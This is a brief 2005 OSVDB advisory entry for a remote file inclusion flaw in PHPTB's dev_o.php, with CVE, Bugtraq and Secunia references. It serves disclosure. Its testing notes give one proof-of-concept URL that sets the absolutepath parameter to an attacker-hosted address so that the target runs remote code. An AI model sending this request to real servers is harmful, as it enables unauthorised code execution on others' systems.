PHPTB dev_o.php absolutepath Variable Remote File Inclusion

2005-08-17T11:17:41
ID OSVDB:18816
Type osvdb
Reporter OSVDB
Modified 2005-08-17T11:17:41

Description

Manual Testing Notes

http://[target]/[dir]/classes/dev_o.php?absolutepath=http://[attacker]/

References:

Vendor URL: http://www.phptb.com/ Secunia Advisory ID:16492 Related OSVDB ID: 18814 Related OSVDB ID: 18815 Related OSVDB ID: 18817 Related OSVDB ID: 18818 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0235.html CVE-2005-2633 Bugtraq ID: 14592